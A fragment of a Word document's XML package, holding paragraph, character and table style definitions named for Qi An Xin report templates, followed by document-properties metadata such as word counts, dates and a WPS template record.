      <w:ind w:left="840"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="63">
    <w:name w:val="正文两侧缩进（奇安信）"/>
    <w:basedOn w:val="29"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:after="50"/>
      <w:ind w:left="200" w:leftChars="200" w:right="200" w:rightChars="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="64">
    <w:name w:val="附录1（奇安信）"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="30"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:widowControl w:val="0"/>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="4"/>
      </w:numPr>
      <w:spacing w:before="480" w:after="100" w:afterLines="100" w:line="240" w:lineRule="auto"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="黑体" w:cs="Times New Roman"/>
      <w:b/>
      <w:sz w:val="44"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="65">
    <w:name w:val="附录2（奇安信）"/>
    <w:basedOn w:val="64"/>
    <w:next w:val="30"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
      </w:numPr>
      <w:spacing w:before="50" w:beforeLines="50" w:after="50" w:afterLines="50"/>
      <w:ind w:right="100" w:rightChars="100"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="66">
    <w:name w:val="附录3（奇安信）"/>
    <w:basedOn w:val="65"/>
    <w:next w:val="30"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="2"/>
      </w:numPr>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="67">
    <w:name w:val="附录4（奇安信）"/>
    <w:basedOn w:val="66"/>
    <w:next w:val="30"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="3"/>
      </w:numPr>
      <w:spacing w:before="163" w:after="163"/>
      <w:ind w:left="1571" w:leftChars="100" w:right="210"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="0"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="68">
    <w:name w:val="标题 6（无编号）（奇安信）"/>
    <w:basedOn w:val="7"/>
    <w:next w:val="30"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
      <w:bCs w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="69">
    <w:name w:val="列表（编号二级）（奇安信）"/>
    <w:basedOn w:val="60"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
      </w:numPr>
      <w:spacing w:before="0" w:beforeLines="0"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="70">
    <w:name w:val="列表（符号二级）（奇安信）"/>
    <w:basedOn w:val="62"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
      </w:numPr>
      <w:ind w:left="1260"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="71">
    <w:name w:val="脚注文本 Char"/>
    <w:basedOn w:val="22"/>
    <w:link w:val="15"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="72">
    <w:name w:val="文本段落引用（奇安信）"/>
    <w:basedOn w:val="30"/>
    <w:next w:val="30"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:color="auto" w:sz="4" w:space="1"/>
        <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="1"/>
      </w:pBdr>
      <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
      <w:ind w:firstLine="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="73">
    <w:name w:val="文本段落强调（奇安信）"/>
    <w:basedOn w:val="30"/>
    <w:next w:val="30"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="74">
    <w:name w:val="版权说明（奇安信）"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="30"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:eastAsia="黑体"/>
      <w:b/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="75">
    <w:name w:val="表格内容居中（奇安信）"/>
    <w:basedOn w:val="29"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="76">
    <w:name w:val="表正文"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="77"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:wordWrap w:val="0"/>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:jc w:val="left"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="77">
    <w:name w:val="表正文 字符"/>
    <w:link w:val="76"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="78">
    <w:name w:val="标题 6 Char"/>
    <w:basedOn w:val="22"/>
    <w:link w:val="7"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="79">
    <w:name w:val="目录 2（奇安信）"/>
    <w:basedOn w:val="17"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:ind w:left="100" w:leftChars="100"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="80">
    <w:name w:val="目录 3（奇安信）"/>
    <w:basedOn w:val="10"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="81">
    <w:name w:val="正文左侧缩进（奇安信）"/>
    <w:basedOn w:val="29"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:after="50"/>
      <w:ind w:left="200" w:leftChars="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="82">
    <w:name w:val="文档属性标题（奇安信）"/>
    <w:basedOn w:val="29"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:framePr w:hSpace="180" w:wrap="around" w:vAnchor="text" w:hAnchor="margin" w:xAlign="inside" w:y="121"/>
      <w:suppressOverlap/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="83">
    <w:name w:val="插图（奇安信）"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="42"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="78" w:beforeLines="25" w:after="78" w:afterLines="25" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="宋体"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="84">
    <w:name w:val="文档表格标题行列型（奇安信）"/>
    <w:basedOn w:val="21"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:line="300" w:lineRule="auto"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>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blStylePr w:type="firstRow">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体"/>
        <w:b/>
        <w:i w:val="0"/>
      </w:rPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="double" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="double" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="double" w:color="auto" w:sz="4" w:space="0"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="single" w:sz="6" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
        <w:vAlign w:val="center"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
      </w:rPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="85">
    <w:name w:val="文档表格无标题行型（奇安信）"/>
    <w:basedOn w:val="21"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>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blStylePr w:type="firstRow">
      <w:pPr>
        <w:wordWrap/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
      </w:rPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:b/>
      </w:rPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="nwCell">
      <w:rPr>
        <w:b/>
      </w:rPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="86">
    <w:name w:val="文档表格无标题列型（奇安信）"/>
    <w:basedOn w:val="21"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>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blStylePr w:type="firstRow">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体"/>
        <w:b/>
        <w:i w:val="0"/>
      </w:rPr>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="double" w:color="auto" w:sz="4" w:space="0"/>
          <w:left w:val="double" w:color="auto" w:sz="4" w:space="0"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="double" w:color="auto" w:sz="4" w:space="0"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="single" w:sz="6" w:space="0"/>
          <w:tl2br w:val="nil"/>
          <w:tr2bl w:val="nil"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
        <w:vAlign w:val="center"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:sz w:val="21"/>
      </w:rPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="87">
    <w:name w:val="文档属性（奇安信）"/>
    <w:basedOn w:val="82"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:framePr w:wrap="around"/>
      <w:ind w:left="50" w:leftChars="50"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="88">
    <w:name w:val="封页内容（奇安信）"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:tabs>
        <w:tab w:val="left" w:pos="5678"/>
      </w:tabs>
      <w:wordWrap w:val="0"/>
      <w:spacing w:after="50" w:afterLines="50" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="89">
    <w:name w:val="目录1级（奇安信）"/>
    <w:basedOn w:val="13"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="90">
    <w:name w:val="图表目录条例（奇安信）"/>
    <w:basedOn w:val="16"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
      </w:tabs>
      <w:ind w:left="420" w:hanging="210"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="91">
    <w:name w:val="标题 5 Char"/>
    <w:basedOn w:val="22"/>
    <w:link w:val="6"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="92">
    <w:name w:val="表格内容两端对齐(奇安信)"/>
    <w:basedOn w:val="29"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="93">
    <w:name w:val="表格内容 靠左（奇安信）"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:line="300" w:lineRule="auto"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="94">
    <w:name w:val="表格-头 （奇安信）"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:line="300" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Times New Roman"/>
      <w:b/>
      <w:kern w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="95">
    <w:name w:val="表格标注 （奇安信）"/>
    <w:basedOn w:val="42"/>
    <w:next w:val="94"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="96">
    <w:name w:val="style5"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="97">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLine="420" w:firstLineChars="200"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsiaTheme="minorEastAsia"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="98">
    <w:name w:val="附录1奇安信"/>
    <w:basedOn w:val="64"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:spacing w:after="326"/>
      <w:ind w:left="907" w:hanging="907"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="黑体" w:hAnsi="黑体"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="99">
    <w:name w:val="正文1"/>
    <w:basedOn w:val="30"/>
    <w:link w:val="101"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:wordWrap/>
      <w:ind w:firstLine="420"/>
      <w:jc w:val="left"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="100">
    <w:name w:val="正文首行缩进（奇安信） 字符"/>
    <w:basedOn w:val="48"/>
    <w:link w:val="30"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="101">
    <w:name w:val="正文1 字符"/>
    <w:basedOn w:val="100"/>
    <w:link w:val="99"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="102">
    <w:name w:val="正文文本 Char"/>
    <w:basedOn w:val="22"/>
    <w:link w:val="8"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="103">
    <w:name w:val="正文首行缩进 Char"/>
    <w:basedOn w:val="102"/>
    <w:link w:val="19"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="104">
    <w:name w:val="10"/>
    <w:basedOn w:val="22"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="105">
    <w:name w:val="15"/>
    <w:basedOn w:val="22"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="106">
    <w:name w:val="标题 2(self)"/>
    <w:basedOn w:val="3"/>
    <w:next w:val="30"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="240" w:line="360" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
      <w:bCs w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="107">
    <w:name w:val="标题 4(self)"/>
    <w:basedOn w:val="5"/>
    <w:next w:val="30"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="120" w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
      <w:bCs w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="108">
    <w:name w:val="标题 3（奇安信） Char"/>
    <w:link w:val="109"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:eastAsia="黑体"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="109">
    <w:name w:val="标题 3(self)"/>
    <w:basedOn w:val="4"/>
    <w:next w:val="30"/>
    <w:link w:val="108"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="960"/>
      </w:tabs>
      <w:spacing w:before="240" w:after="240" w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="黑体"/>
      <w:bCs w:val="0"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="110">
    <w:name w:val="插图(self)"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="111"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="25" w:beforeLines="25" w:after="25" w:afterLines="25" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="宋体"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="111">
    <w:name w:val="插图标注(self)"/>
    <w:next w:val="29"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:after="156"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Arial"/>
      <w:kern w:val="0"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="112">
    <w:name w:val="标题 6（有编号）(self)"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="30"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:widowControl w:val="0"/>
      <w:numPr>
        <w:ilvl w:val="5"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="120" w:line="300" w:lineRule="auto"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="黑体"/>
      <w:b/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="113">
    <w:name w:val="表格内容居中(self)"/>
    <w:basedOn w:val="29"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="114">
    <w:name w:val="标题 1(self)"/>
    <w:basedOn w:val="2"/>
    <w:next w:val="30"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:spacing w:before="360" w:after="360" w:line="360" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="黑体"/>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182</Words>
  <Characters>210</Characters>
  <Lines>1</Lines>
  <Paragraphs>1</Paragraphs>
  <TotalTime>5</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>218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2020-04-29T14:21:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-23T12:29:53Z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E3ED6D9CB653494487D2B182D05DC6A9_13</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOTemplateDocerSaveRecord">
    <vt:lpwstr>eyJoZGlkIjoiZTNhMTQ4NzhjMzQ3MGQyM2E3OWVkNjExNWMyMGE4NjYiLCJ1c2VySWQiOiI3NjM4MjM2NzgifQ==</vt:lpwstr>
  </property>
</Properties>
</file>